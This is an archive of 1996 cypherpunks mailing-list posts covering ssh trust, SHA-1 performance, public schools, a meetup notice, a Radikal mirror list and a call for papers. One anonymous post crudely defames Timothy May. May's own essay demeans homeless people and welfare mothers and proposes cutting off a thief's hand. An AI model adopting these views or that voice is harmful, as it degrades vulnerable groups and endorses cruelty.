Do you already have this information ?

   http://www.vv.com.au/vv/resources/security/livepgp/README.html

The copy is expiring soon. I will soon be releasing a new copy which is 
much for polished. 

I am not releasing the source.


----- End of forwarded message from Ming-Ching Tiew -----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Sat, 28 Sep 1996 01:22:34 +0800
To: Adam Shostack <adam@homeport.org>
Subject: Re: ssh - How widely used?
In-Reply-To: <199609270039.TAA05797@homeport.org>
Message-ID: <199609271433.KAA08550@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Adam Shostack writes:
> 	Theres a windows version, mac is under vauge development.  SSH
> is pretty cool, but the code base is somewhat messy, and its shows
> signs of its origins in things like systems calls not having their
> return values checked.
> 
> 	Despite all this, I use it, like it, and recomend it for use
> in systems not likely to come under attack by professionals.

I actually think its probably okay even for systems that might come
under professional attack -- I don't recommend it for use on systems
that are mission critical, though, like systems running transactions
and such. Indeed, I don't recommend running ANYTHING on such systems
unless you are really, really, really careful about what you are
running and where you are running it from.

.pm




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Eric Young <eay@mincom.oz.au>
Date: Fri, 27 Sep 1996 13:28:21 +0800
To: Steve Reid <steve@edmweb.com>
Subject: Re: Public domain SHA-1 in C
In-Reply-To: <Pine.BSF.3.91.960926163530.518A-100000@bitbucket.edmweb.com>
Message-ID: <Pine.SOL.3.91.960927103628.11800D-100000@orb>
MIME-Version: 1.0
Content-Type: text/plain



On Thu, 26 Sep 1996, Steve Reid wrote:
> I've written an implementation of SHA-1 in C. Public domain, so you can
> hack it to your hearts content and/or use it however you want. You can
> download it from
> http://www.edmweb.com/steve/sha1.c
...
> It's reasonably fast (the 80 core SHA operations look good) but I'm
> certain that there's room for improvement. 

Some times for this implementation

sha1 over a ~ 6 meg file, sparc 10
user time	5.23s 5.23s 5.14s

Replace your 'getc() into 256 byte buffer' loop with a 'read 16k at a 
time' (I actually put your functions into my sha1 digest program).
user time	3.79s 3.75s 3.72s

Use sha1 from SSLeay.
user time	2.32s 2.34s 2.24s


Using gcc -O3 -fomit-frame-pointer for all builds and I left out by 
B_ENDIAN advisory define; all permutations 
produced the same digest, so the 2 SHA1 implementations conform :-).

The key thing that speeds up the SSLeay sha1 is the avoidance of copying
in the SHA1Update() type function.  Have a look if you like 
(crypto/sha/sha_dgst.c.  
The actually SHA1 digesting on 64 bytes is probably identical.  For most 
message digests, it appears the bigest problem is shoveling data into the 
algorithm fast enough.

eric

PS 	The MD2, MD5, SHA1 etc implemented in SSLeay are all stand alone
	functions/libraries than can be compiled and used outside of the
	SSLeay library build environment.  This also applies to the IDEA,
	DES (libdes), RC2 and RC4 cipher subroutines present in the library.

For those on the cipherpunks list (which I don't frequent any-more), the
current version is SSLeay 0.6.4, it can be built as a shared library under
unix and will build as thread safe DLL's under Windows 3.1/95/NT.  It is 
thread safe under unix as well (only really tested under Solaris 2.5.1).

http://www.psy.uq.oz.au/~ftp/Crypto
ftp://ftp.psy.uq.oz.au/pub/Crypto/SSL
ftp://ftp.psy.uq.oz.au/pub/Crypto/SSLapps

--
Eric Young                  | BOOL is tri-state according to Bill Gates.
AARNet: eay@mincom.oz.au    | RTFM Win32 GetMessage().






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@huge.cajones.com (Huge Cajones Remailer)
Date: Sat, 28 Sep 1996 05:36:10 +0800
To: cypherpunks@toad.com
Subject: The periodic word of advice about Timothy May, the licenced fellatiologist
Message-ID: <199609271806.LAA07079@fat.doobie.com>
MIME-Version: 1.0
Content-Type: text/plain


There's a rumor that Timothy May sells his dead 
relatives as fertiliser as they constitute the best 
shit in California.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Greg Kucharo <sophi@best.com>
Date: Sat, 28 Sep 1996 06:15:03 +0800
To: shamrock@netcom.com (Lucky Green)
Subject: Re: "Soul Catcher" Computer Chip (fwd)
In-Reply-To: <Pine.3.89.9609270951.A23028-0100000@netcom14>
Message-ID: <199609271819.LAA01793@shellx.best.com>
MIME-Version: 1.0
Content-Type: text/plain


  I think this lends new meaning to the phrase,"been there, done that".

Greg Kucharo
sophi@best.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Lsurfer@cris.com (Randy Bradakis)
Date: Sat, 28 Sep 1996 07:12:38 +0800
To: cypherpunks@toad.com
Subject: Re: Public Schools
In-Reply-To: <324BD4FD.3372@unidial.com>
Message-ID: <Rb/SyozvQEIV091yn@cris.com>
MIME-Version: 1.0
Content-Type: text/plain


The human formerly known as "ronsimpson <ronsimpson@unidial.com>" wrote:
{I hate to burst any bubbles but, the school with the highest number of
{National Merit Finalists and highest number of 1600 SATs is a Public
{High School (Jefferson High in Fairfax, VA)

Er, how about the schools with the highest percentages, not the largest
number?  A public school will most certainly have more students than
home schools or private schools.

Every home schooled child I know has a significantly better grasp on
the world than any public or private schooled child.  Perhaps only
because their parents take a great interest in their education, but
the results stand out regardless.  

Cypherpunk relevance?  Sure - what does the gubmint allow you to do?
What information are you allowed to learn, and from what authorized
sources?  How are those sources authorized?  Who stamps the seal of
information approval upon those documents, and how do we know that
the information isn't simply a 'corrected' view of history (or physics,
or english language...)?  We don't, unless there are multiple channels
of information to compare against, from 'signed' by experts, to 
pseudonymous authors, to completely anonymous authors.  The only way
to be certain that your children learn about the way things _really_ 
are, is to allow for these sources.


-- 
no sig too small




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Sat, 28 Sep 1996 03:17:35 +0800
To: Chad Dougherty <chad@lycos.com>
Subject: Re: ssh - How widely used?
In-Reply-To: <199609270608.CAA24129@rat.eng.lycos.com>
Message-ID: <199609271552.LAA08679@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Chad Dougherty writes:
>  > 	Despite all this, I use it, like it, and recomend it for use
>  > in systems not likely to come under attack by professionals.
> 
> Why do you say "not likely to come under attack by professionals"?
> Have you found security holes in it?

Security professionals do not recommend use of systems they feel less
than perfectly comfortable with whether or not they know of specific
holes.

Perry

PS sorry for posting something about a cryptographic security system
in the midst of all the normal talk -- I know its off topic.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Christian Claborne <claborne@CYBERTHOUGHT.com>
Date: Sat, 28 Sep 1996 06:35:01 +0800
To: mthompso@qualcomm.com
Subject: San Diego CPunk Physical meeting this comming Thursday
Message-ID: <2.2.32.19960927185434.0031daf0@cyberthought.com>
MIME-Version: 1.0
Content-Type: text/plain



<<<<< NOTE! I have a new address!!! >>>>>>

Next Thursday!!!

San Diego Area CPUNKS symposium  Thursday, Oct. 3, 1996.

   Invitation to all Cypherpunks to join the San Diego crowd at "The Mission
Cafe & Coffee Shop".  We discuss cryptography and other related subjects, have
the special cypherpunk dinner, and unwind after a long day at the grind stone.

   Don't forget to bring your public key  fingerprint.  If you can figure out
how to get it on the back of a business card, that would be cool.  If you want
the suspicious crowd there to sign your key, bring two forms of ID.

   Michelle is going to bring her PGP fingerprint in for signature.  Can you
believe it?

   Hopefully Lance Cottrell will give us an update on Mixmaster and what's going
on at San Diego's best ISP.  

   You can also get the scoop on the latest development of my job situation
(hint, some people are getting free eats from me on Thurs).  

   
Place: The Mission Cafe & Coffee Shop
       3795 Mission Bl in Mission Beach.
       488-9060


Time:1800

Their Directions:
	8 west to Mission Beach Ingram Exit
	Take west mission bay drive
	Go right on Mission Blvd.

	On the corner of San Jose and mission blvd.
	It is located between roller coaster and garnett.
	It's kind of 40s looking building...  funky looking 
        (their description, not mine)

They serve stuff to eat, coffee stuff, and beer + wine.

See you there!

New guy, bring your fingerprint.

Drop me a note if you plan to attend... 

NOTE: My primary e-mail address has changed to use my own domain.  You can 
reach me at "claborne@cyberthought.com". Permanently replace any other address
that you may have for me.  I am currently not subscribed to the CP list since
my current internet connection is slow (I can't afford anything right now :)

      2
  -- C  --


                              ...  __o
                             ..   -\<,
Claborne@CYBERTHOUGHT.com    ...(*)/(*)._ Providing thoughts on 
					  your computing needs.
http://www.CYBERTHOUGHT.com/cyberthought/
PGP Pub Key fingerprint =  7E BF 38 3F 24 A7 D1 B0  54 44 96 AA 10 D0 5D 51
Avail on Pub Key server.  PGP-encrypted e-mail welcome!
Dreams.  They are just a "screen saver" for the brain.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Declan McCullagh <declan@eff.org>
Date: Sat, 28 Sep 1996 06:17:36 +0800
To: ronsimpson <ronsimpson@unidial.com>
Subject: Re: Public Schools
In-Reply-To: <324BD4FD.3372@unidial.com>
Message-ID: <Pine.SUN.3.91.960927120407.8474A-100000@eff.org>
MIME-Version: 1.0
Content-Type: text/plain


Yeah, Fairfax has good schools. But you're misrepresenting the truth: 
what school has the highest *percentage* of 1600 SATers, etc.

I suspect Jefferson High is larger than most private schools.

-Declan


On Fri, 27 Sep 1996, ronsimpson wrote:

> I hate to burst any bubbles but, the school with the highest number of
> National Merit Finalists and highest number of 1600 SATs is a Public
> High School (Jefferson High in Fairfax, VA)
> 


// declan@eff.org // I do not represent the EFF // declan@well.com //






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: azur@netcom.com (Steve Schear)
Date: Sat, 28 Sep 1996 06:21:57 +0800
To: cypherpunks@toad.com
Subject: Decense: What ever happened to it?
Message-ID: <v02130500ae7176a6f611@[10.0.2.15]>
MIME-Version: 1.0
Content-Type: text/plain


I haven't seen anything on the Net since February regarding Ray Cromwell's
Decense Web anonymity project.  Does anybody on the list have more recent
info?



PGP Fingerprint: FE 90 1A 95 9D EA 8D 61  81 2E CC A9 A4 4A FB A9
---------------------------------------------------------------------
Snoop Daty Data           | Internet: azur@netcom.com
Grinder                   | Voice: 1-702-655-2877
Sacred Cow Meat Co.       | Fax: 1-702-658-2673
7075 W. Gowan Road, #2148 |
Las Vegas, NV 89129       |
---------------------------------------------------------------------

Just say NO to prescription DRUGS.

"Of all tyrannies, a tyranny sincerely exercised for
 the good of its victims may be the most oppressive."
    -- C.S. Lewis

"Surveillence is ultimately just another form of media, and thus, potential
entertainment."
    -- G. Beato






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tank <tank@xs4all.nl>
Date: Fri, 27 Sep 1996 21:29:04 +0800
To: tank@xs4all.nl (tank)
Subject: radikal-mirror list as of 27-9-1996
Message-ID: <199609271027.MAA09630@xs1.xs4all.nl>
MIME-Version: 1.0
Content-Type: text/plain




Receive Radikal 154 by email: 

     Send a empty message to radikal@xs4all.nl
     and you receive issue 154 by mail. 

http: 

     http://www.xs4all.nl/~bslash/radikal/radikal.tar.gz Radikal-site unix

     http://www.xs4all.nl/~bslash/radikal/radi.zip Radikal-site dos-zip

ftp: 

     ftp://utopia.hacktic.nl/pub/replay/pub/incoming

Radikal 154 in plaintext ASCII 

     http://www.xs4all.nl/~radikal/radi154.tgz Radikal 154 unix archive 

     http://www.xs4all.nl/~radikal/radi154.zip Radikal 154 dos-zip archive 

If you got your mirror up and running let us know <tank@xs4all.nl>

     Special mirror: 
     de.soc.zensur 
     de.org.politik.spd 

Radikal-sites: 

   1.BACK ONLINE http://www.xs4all.nl/~radikal 

   2.BACK ONLINE http://www.xs4all.nl/~tank/radikal 

   3.http://huizen.dds.nl/~tank/radikal 

   4.http://burn.ucsd.edu/%7Eats/RADIKAL/ 

   5.http://www.jca.or.jp/~taratta/mirror/radikal/ 

   6.http://www.serve.com/~spg/ 

   7.http://huizen.dds.nl/~radikal 

   8.http://www.canucksoup.net/radikal/index.html 

   9.http://www.ecn.org/radikal 

  10.http://www.well.com/~declan/mirrors/ 

  11.http://www.connix.com/~harry/radikal/index.htm 

  12.http://www.ganesa.com/radikal/ 

  13.http://www.denhaag.org/~radikal 

  14.http://www.knooppunt.be/~daniel/radikal 

  15.http://emma.unm.edu/radikal 

  16.http://www.tacacs.com/radikal/" 

  17.http://www.dsvenlo.nl/~vvd/radikal/ 

  18.http://www.why.net/home/static/radi 

  19.http://users.abcs.com/dockmstr/mirror/radikal/index.htm 

  20.http://home.ipr.nl/~radikal/ 

  21.http://www.dreamy.demon.co.uk/occam/ 

  22.http://www.ibmpcug.co.uk/~irdial/live_free/ 

  23.http://zero.tolerance.org/radi/index.htm 

  24.http://www.meaning.com/library/radikal/ 

  25.http://www.walli.uwasa.fi/~tviemero/radikal 

  26.http://www.sko.it/~sfede/radi/index.htm 

  27.http://www.bart.nl/~sz/index.html 

  28.http://bellp.med.yale.edu/index.htm 

  29.http://www.euronet.nl/users/funest/radi/index.htm 

  30.http://fine.com/~rsr/radikal 

  31.http://www.lab.net/radikal 

  32.http://www.charm.net/~gbarren/radikal 

  33.http://login.datashopper.dk/~pethern/radikal/ 

  34.http://www.interlaw.com 

  35.http://hyperreal.com/~rich/radikal/index.html 

  36.http://www.citinv.it/iniziative/info/radikal/ 

  37.http://radikal.autono.net./rad 

  38.http://www.digiforest.com/~richards/radikal/ 

  39.http://brazil.nbn.com/radikal/ 

  40.http://pitel-lnx.ibk.fnt.hvu.nl/~madcat 

  41.http://www.hongo.ecc.u-tokyo.ac.jp/~ss56012/radikal/ 

  42.http://web.inter.nl.net/users/E.P.van.der.Vlis/radikal/ 

  43.http://www.threeweb.ad.jp/~fubuki71/mirror/radikal/ 

  44.http://mars.let.uva.nl/~bram/radikal/ 

  45.http://www.design.nl/~bram/radikal/ 

  46.http://www.eskimo.com/~quawk/radikal/ 

  47.http://www.luc.ac.be/~2sbs0 a passtrue page to xs4all and the radikal pages. 

  48.http://www.calyx.com/~refuse/radikal/ 

  49.http://www.altair.it/xxv 

  50.http://www.c2.net/radikal 

  51.http://www.grfn.org/~rtwo 

  52.http://www.grfn.org:4380 xs4all port mirror 

  53.http://www.cyberpass.net/radikal 

  54.http://www.xs4all.nl/~jeroenw/radikal/ 

  55.http://catalog.com/jamesd/radikal/ 

  56.http://www.islandnet.com/~hendrik/RADIKAL.html 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brian D Williams <talon57@well.com>
Date: Sat, 28 Sep 1996 06:37:04 +0800
To: cypherpunks@toad.com
Subject: [SUGGESTION] signal/noise ratio
Message-ID: <199609271930.MAA04776@well.com>
MIME-Version: 1.0
Content-Type: text/plain



In the interest of those who wish a significant increase in the
signal/noise ratio I make a proposal. Significant crypto related
posts could be prefaced with [CRYPTO] on the subject line on a
strictly volunteer basis, that way those desiring a more topical
list could have one simply by setting the appropriate filter.

Items crypto related but missing the [CRYPTO] header could be
reposted by well meaning souls.

Other appropriate headers could of course be used.

Brian




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ISP-TV Main Contact <isptv@access.digex.net>
Date: Sat, 28 Sep 1996 04:20:28 +0800
Subject: David Sobel interview on ISP-TV Monday Night Sept. 30
Message-ID: <199609271631.MAA02841@access5.digex.net>
MIME-Version: 1.0
Content-Type: text/plain


*** ISP-TV Program Announcement: David Sobel Interview ***

Monday, Sept. 30 
9:00 PM ET

David Sobel is a legal counsel to the Electronic Privacy Information Center,
and an outspoken crusader for Internet free speech, cryptographic rights,
and on-line privacy.  He has litigated dozens of Freedom of Information Act 
(FOIA) cases involving subjects such as the Digital Signature Standard, the 
Clipper Chip, the FBI's Digital Telephony proposal and the 2600/Pentagon City 
Raid.  He has also written for WIRED magazine, and "The Net" online magazine.  

This video interview can be viewed on the ISP-TV main CU-SeeMe reflector
at IP 205.197.247.33, or other ISP-TV affiliate reflectors listed at
http://www.digex.net/isptv/members.html

See URL http://www.digex.net/isptv for more information about the ISP-TV
Network

To obtain CU-SeeMe software, see URL http://www.wpine.com/cudownload.htm




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Timothy C. May" <tcmay@got.net>
Date: Sat, 28 Sep 1996 07:17:11 +0800
To: cypherpunks@toad.com
Subject: Workers, Public Schools, Tradesmen, and Justice
In-Reply-To: <9608278438.AA843856542@smtplink.alis.ca>
Message-ID: <v03007800ae71e5a92653@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain


At 1:35 PM -0500 9/27/96, jbugden@smtplink.alis.ca wrote:

>If you want to refuse those who are too stupid or anti-social from Public
>Schools in order to improve the social or intellectual climate, you better
>have
>a solution for the resulting cast-offs.

Believe me, I don't mean to be provocative (in a trolling sense), but "I
have a solution."

More students should, fairly early on, be "flunked out" of courses in the
"academic/professional track" and moved into _trades_. For example, the way
many European countries have outstanding vocational/trade schools. The
usual trades: machinists, woodworkers, auto mechanics, technicians of all
sorts, and so on. Few of these trades need, or even benefit from, courses
in history, mathematics (beyond simple algebra and a tad of geometry, not
the really neat stuff about proving Euclid's theorems in novel ways, the
things people like me excelled in, but which left many other students
shaking their heads and barely passing the class), etc. Most of the
academic subjects in high school are neither needed nor remembered.

(And I reject any of the common arguments that Americans need to learn
history, the Constitution, etc. Few of them remember a single word they
learned, and one might as well teach the basics in earlier grades and
dispense with meaningless lectures about how and when the Senate may invoke
cloture, how the Foreign Powers Act modified the 1877 Trade Act, and so on.)

As I look around me, here in Santa Cruz, I see hundreds of "homeless
persons.: We used to call them beggars, bums, panhandlers, winos, hobos,
and drifters. The people unwilling to get up in the morning for a boring
job, the people unwilling to take the donations they get and buy some new
clothes at the Salvation Army (I know people of both sexes who buy their
business clothes at thrift shops, at huge discounts, so I reject any of the
usual arguments that this won't work.)

When I see people working at Taco Bell, Burger King, gas stations, etc.,
and then I see the so-called "homeless," the situation is completely clear
to me. And, like pigeons, if you begin feeding the beggars, you'll have
more of them.

There's a further point to consider. In times past, many of the "marginal"
people had other kinds of jobs. Maids, gardeners, cooks, stable boys,
butlers, etc. (I'm not saying they were all subnormal, neurotic, etc., just
that many of them didn't fit into other sorts of jobs--like running the
town store, raising sheep, shoeing horses, and other "professions," such as
they were then--and working for others as maids and assistants of various
sorts was a kind of sheltered, almost "familial," kind of employment.
Shelter was often provided on-site, further aiding those who might find it
hard to cope with the outside "market."

These jobs have largely gone away. Partly because houses have gotten
smaller (compared to manor houses, for example), partly because of
automation and other technological advances (cars, refrigerators, etc.),
partly because of "egalitarian" sentiments that tend to discourage people
from either hiring maids or from seeing maid service as a longterm career.
(Getting back to an earlier point, that dingbat studying "Sociology 101"
and "History of Consciousness" at Valley Girl Community College is being
_told_ she's headed for a professional career, despite her lack of interest
in academic topics and her marginal abilities....there's no way someone
like her will think seriously of such a "low-class" job as a maid! Better
for her to cadge for spare change and deal some drugs on the side than do
something that demeaning.)

It has also become almost impossible to find good tradespeople. Stories of
good gardeners, babysitters, maids, and even roofers being "hoarded" by
Marin County or Beverly Hills millionaires are only partially exaggerated.
This has a lot to do with the limited supply, and also with problems of
work ethic, honesty, and such things, many of which have changed rather
dramatically in recent decades. Where once a worker in one's house could
mostly be trusted, despite the occasional reports of items of silverware
missing, today's workers are seldom to be trusted alone in the house.
Horror stories abound of "home alone" workers throwing parties, rooting
through the personal papers of their employers, and of robbing the houses
of whatever they could carry.

And the "nanny tax" and related paperwork needed to hire a person for even
a few hours worth of work has made much casual work (the "odd jobs" that
drifters used to get to earn enough money to eat) almost impossible to
arrange. (Every morning there are Mexicans lined up in the parking lot of a
K-Mart in a nearby town, with contractors seeking to hire temporary
laborers. The contractors know all the forms to fill out, if they bother.
Casual employers like me know they risk heavy fines if caught hiring
"undocumented workers," or failing to dot all the "i"s and cross all the
"t"s, even for a 4-hour job. So much for liberty.

For the last couple of weeks I've been hauling 70-pound stones to build a
retaining wall (don't ask me about the permits I should've gotten), ripping
up redwood deck boards, digging postholes for a new fence, and generally
doing a couple of hours of manual labor every day. While it has its
advantages, in earlier days I could've counted on providing some employment
for someone who today is "a homeless person." No more. They're not
psychologically prepared to do a solid (if unspectacular) job, as they've
been taught for all of their lives that they went through high school and
maybe a couple of years of college (and maybe more) so they could join the
professional ranks....when they see they really won't be joining the
professional ranks, and that they really don't want to make the sacrifices
to, they have nothing to fall back on.

So, in the "olden days," the social bargain was this: I'd spend some of the
money I'd accumulated in whatever manner I had and exchange it with some of
the tradespeople or laborers for their labor. A fair deal for both.

Now, we've got trash littering our highways, but nobody thinks seriously of
having prisoners pick it up (the "chain gangs" when I was a kid), or having
"welfare mothers" out picking it up, or having day laborers do the work.
Ditto for all sorts of other "infrastructure" work that's needed.

(I knew someone married to a honcho in CalTrans, the California Department
of Transportation, responsible for the freeways. He confirmed that "cheap
labor" is barred, by various union contracts negotiated over the years, and
that the starting pay for CalTrans workers is $30K a year...probably more
by now. So, "homeless people" are sitting around begging for spare change
and harassing passersby, welfare mothers are collecting welfare, AFDC, food
stamps, and WIC money for doing nothing except their specialty (as someone
noted, "welfare-powered bastard factories"), University of California
"History of Consciousness" (yes, a real major) graduates are waitressing
tables at local Santa Cruz restaurants (because they can't find employers
who want a "HofC" graduate, as with so many worthless majors), all the
while CalTrans is hiring "transportation engineers" for
far-more-than-market prices to pick up trash on highways. Anybody still
think things are not out of whack?)

My conclusion is simple: Tell people if they don't work, they won't eat. If
they do something others are willing to give them money to do, they won't
get money. They won't get "entitlements" from the government (= taxpayers,
= those who are working, = me and thee). Tell them that a college education
should only be pursued if one has a "calling" to be an engineer, a
programmer (and probably not even that, judging by what I see), a doctor, a
lawyer (on second thought, don't ever suggest they become lawyers), and so
on.

And make it easier to hire people, instead of harder. (And if one hires a
maid, and the maid steals, cut off her hand. We've lost sight of justice,
and people think that ripping off the rich is their kind of justice. This
needs to change.)

Even liberals are beginning to understand the "game theory" aspects. Like
pigeons, if you feed them, you'll have more bums, winos, addicts, drifters,
and beggars. If you give people money when they have babies, whether they
are working or married, they'll drift into having more babies. (Not as a
carefullly-considered choice, but for a variety of systemic, psychological,
game-theoretic, and "path of least resistance" reasons.)

Psychologists and similar psychobabblers call it "tough love." If one
always "enables" an addict, a layabout, a shiftless worker, with excuses
and handouts, the behavior does not change. To save a person, sometimes
harshness is needed.

This is why crypto anarchy's starving of the tax system is good. It may
"kill" some number of people, as nearly any new idea does, but ultimately
it will put things back on track.

--Tim May


We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1,257,787-1 | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@homeport.org>
Date: Sat, 28 Sep 1996 04:57:42 +0800
To: perry@piermont.com
Subject: Re: ssh - How widely used?
In-Reply-To: <199609271552.LAA08679@jekyll.piermont.com>
Message-ID: <199609271823.NAA08790@homeport.org>
MIME-Version: 1.0
Content-Type: text


Actually, I recommend systems based on threat and comfort.  If the
system is protected (ie, behind a firewall, on a compartmentalized
network), I use ssh, no problem.  I use ssh even where I'm not
comfortable with it because I'm more comfortable with it than with the
alternatives, but there are times when the "No remote access" option
is more comfortable than ssh.

Adam

Perry E. Metzger wrote:

| Chad Dougherty writes:
| >  > 	Despite all this, I use it, like it, and recomend it for use
| >  > in systems not likely to come under attack by professionals.
| > 
| > Why do you say "not likely to come under attack by professionals"?
| > Have you found security holes in it?
| 
| Security professionals do not recommend use of systems they feel less
| than perfectly comfortable with whether or not they know of specific
| holes.



-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jbugden@smtplink.alis.ca
Date: Sat, 28 Sep 1996 05:25:00 +0800
Subject: Re: Public Schools
Message-ID: <9608278438.AA843856542@smtplink.alis.ca>
MIME-Version: 1.0
Content-Type: text/plain



ronsimpson@unidial.com wrote:
>I hate to burst any bubbles but, the school with the highest number
> of National Merit Finalists and highest number of 1600 SATs is a 
> Public High School (Jefferson High in Fairfax, VA)

The same is true for Montreal (Royal Vale) using the equivalent scoring methods.
But there are public schools at both extremes of the curve.

While it is true that Private Schools would not survive due to market forces if
they did consistently poorly, it is also true that they filter their incoming
student body in a manner that Public Schools can not.

If you want to refuse those who are too stupid or anti-social from Public
Schools in order to improve the social or intellectual climate, you better have
a solution for the resulting cast-offs.

James





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Sat, 28 Sep 1996 07:10:08 +0800
To: cypherpunks@toad.com
Subject: Re: Public Schools
In-Reply-To: <v03007800ae71bb8f8b1f@[207.167.93.63]>
Message-ID: <o7DXuD1w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


"Timothy C. May" <tcmay@got.net> writes:
> Yes, shocking as it may seem, I AM A PRODUCT OF PUBLIC SCHOOLS.

That's pretty obvious.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jya@pipeline.com (John Young)
Date: Sat, 28 Sep 1996 01:24:07 +0800
To: cypherpunks@toad.com
Subject: HBO_ped  Phill's AP Op-Ed
Message-ID: <199609271432.OAA17432@pipe1.ny3.usa.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   9-27-96. NYP: 
 
   "Unnoticed but Deadly, the I.R.A.'s Secret 'Sleeper' " 
 
      Members of a counterterrorism force stormed the building 
      where Mr. O'Neill lived, threw tear-gas canisters into 
      his second-floor back apartment and shot him six times 
      as he stood in the doorway. The police said Mr. O'Neill 
      made a threatening gesture at them, but he was later 
      found to have been unarmed. An intelligence officer 
      said, "The sleeper is totally committed, aware of all 
      the surveillance techniques and our ability to penetrate 
      the organization. He knows when to keep his mouth shut. 
      He stays as anonymous as possible." 
 
   "South African Links Top Spy To the Slaying Of Olof Palme" 
 
      The commander of a police hit squad testified today that 
      the assassination, by a lone gunman who shot Mr. Palme 
      in the back of the head, had been the work of Operation 
      Long Reach, a secret apartheid-era program intended to 
      harass, silence and gather information about opponents 
      of South Africa's white-led Government abroad. "It was 
      one of Craig Williamson's Operation Long Reach 
      projects," he said. 
 
      Officially, Mr. Williamson left the police department in 
      1985, ostensibly to go into business with an Italian 
      millionaire operating from the Seychelles. In reality, 
      he then started Long Reach, a company that did some 
      legitimate international security work, but which was 
      largely created to give him the cover to do whatever he 
      pleased around the world. 
 
   ----- 
 
   http://jya.hboped.txt 
 
   HBO_ped 
 
 
 
 
 
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Sat, 28 Sep 1996 09:41:20 +0800
To: cypherpunks@toad.com
Subject: Re: Internet plug pulled on Colombia's guerrillas
Message-ID: <199609272133.OAA11948@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 03:05 PM 9/26/96 -0700, Chris Adams wrote:
>Internet plug pulled on Colombia's guerrillas
>              3:05pm EDT, 9/26/96
>BOGOTA, Colombia - A Colombian guerrilla group currently
>involved in a bloody offensive in the mountains and jungles,
>suffered a setback in its propaganda battle when its new-tech
>voice on the Internet was mysteriously silenced. 
>
>The Revolutionary Armed Forces of Colombia (FARC), which
>has periodically paralyzed half the country with road blocks,
>found its route to the information superhighway barred. 
>
>The Communist insurgents, who rose up in arms in 1964,
>embraced new technology last year in their fight to overthrow the
>government by launching a home page on the Internet. 

I couldn't resist smiling when I read this.  Not that I want their access 
cut; quite the opposite.  But it is REALLY reassuring to see the authorities 
behave in exactly the fashion you expect them to!  Attempting to cut off 
dissenting political voices IRL is de rigeur; now, this shows that they 
believe "threat" to the government posed by allowing others to voice 
contrary opinions on the 'net is real.



Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Enzo Michelangeli <enzo@ima.com>
Date: Fri, 27 Sep 1996 19:24:41 +0800
To: cypherpunks@toad.com
Subject: Call for Papers
Message-ID: <Pine.WNT.3.95.960927163553.-996033E-100000@stanley.ima.net>
MIME-Version: 1.0
Content-Type: text/plain


FYI...

---------- Forwarded message ----------
Date: Tue, 24 Sep 96 09:49:03 EDT
From: Nick Maxemchuk <nfm@research.bell-labs.com>
To: apc@ee.nthu.edu.tw, apc_members@hornbill.ee.nus.sg,
    commsoft@cc.bellcore.com, enternet@bbn.com, ietf@CNRI.Reston.VA.US,
    itc@fokus.gmd.de, multicomm@cc.bellcore.com, tccc@cs.umass.edu
Subject: Call for Papers


			   CALL	FOR PAPERS
	   IEEE	Journal	on Selected Areas in Communications
		   COPYRIGHT AND PRIVACY PROTECTION

Significant investments	are now	being made worldwide to	develop	an
infrastructure for on-line services and	electronic commerce.  A	major
impediment is the lack of effective protection of copyright for
content	owners and of privacy for users.  Digital data can be easily
copied and redistributed widely	without	any loss of fidelity. One
promising idea is to discourage	illicit	distribution by	watermarking
digital	objects	with hidden copyright messages to proclaim ownership
and unique identifiers to help trace pirates. The techniques of
information hiding are in many ways related to mechanisms that can be
used to	protect	the anonymity of system	users by concealing address,
location and routing information. The problem becomes even more
interesting when privacy protection and	copyright protection must be
combined in the	same system.

We seek	fundamental papers on watermarking of digital data, on
techniques for anonymous communications, and design and	analysis of
systems	that protect copyright and/or privacy.	A partial list of
topics is as follows:

   + watermarking of digital data
   + anonymous communications
   + steganography
   + covert and	subliminal channels in networks	 protocols
   + combining copyright and privacy protection
   + experiments and attacks
   + tradeoffs between performance and security

Prospective authors should email their manuscripts (PostScript format
only) or send six hard copies to one of	the Guest Editors listed
below, according to the	following schedule.  Please direct all email
enquiries to slow@ee.mu.oz.au.

	     Manuscript	Due:		March 1, 1997
